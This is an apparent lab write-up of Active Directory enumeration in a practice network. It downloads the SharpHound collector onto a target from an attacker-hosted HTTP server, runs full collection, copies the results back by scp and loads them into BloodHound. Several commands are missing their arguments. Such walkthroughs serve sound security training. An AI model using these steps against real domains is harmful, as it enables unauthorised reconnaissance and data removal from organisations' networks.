Through Bloodhound

Bloodhound runs locally on an attacker’s machine. The attacker must run a “collector” like sharphound on the target to enumerate domain information. After the collector finishes running, it will output a series of .json files for import into the Bloodhound interface.

On the attack machine:

mkdir sharphound

cd sharphound 

--2022-10-12 14:20:23--
HTTP request sent, awaiting response... 200 OK
Length: 2138953 (2.0M) [application/octet-stream]
Saving to: ‘’

SharpHound-v1.1.0.z 100%[===================>]   2.04M  1.91MB/s    in 1.1s    

2022-10-12 14:20:35 (1.91 MB/s) - ‘’ saved [2138953/2138953]

Start a server to serve it:

python -m http.server 80
Serving HTTP on port 80 ( ...

Now ssh into target machine using the credentials given:


In the target machine terminal, switch to powershell:

za\kenneth.davies@THMJMP1 C:\Users\kenneth.davies\Documents>powershell

Choose a directory to work from (I used Documents, and download the from the http server on the attack machine:

PS C:\Users\kenneth.davies\Documents> Invoke-WebRequest -OutFile


PS C:\Users\kenneth.davies\Documents> Expand-Archive


PS C:\Users\kenneth.davies\Documents> cd SharpHound-v1.1.0

PS C:\Users\kenneth.davies\Documents\SharpHound-v1.1.0> .\SharpHound.exe --CollectionMethods All --Domain --ExcludeDCs  2022-10-12T14:49:52.7476245+01:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2022-10-12T14:50:42.7872718+01:00|INFORMATION|SharpHound Enumeration Completed at 2:50 PM on 10/12/2022! Happy Graphing!

Get name of results:

PS C:\Users\kenneth.davies\Documents\SharpHound-v1.1.0> dir
Directory: C:\Users\kenneth.davies\Documents\SharpHound-v1.1.0

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/12/2022   2:50 PM         139831

On the attack machine, use ssh to copy the bloodhound results over:

scp .

Fire up neo4j and bloodhound:

sudo neo4j start                     
bloodhound &

Drop the copied over results in the bloodhound window, and play around with options.

Start playing around and answer the questions.
  • Use Search for a node... to find specific users, groups, etc.

  • Click on specific properties of an object to visualise it

  • Use the Analysis tab to run built-in queries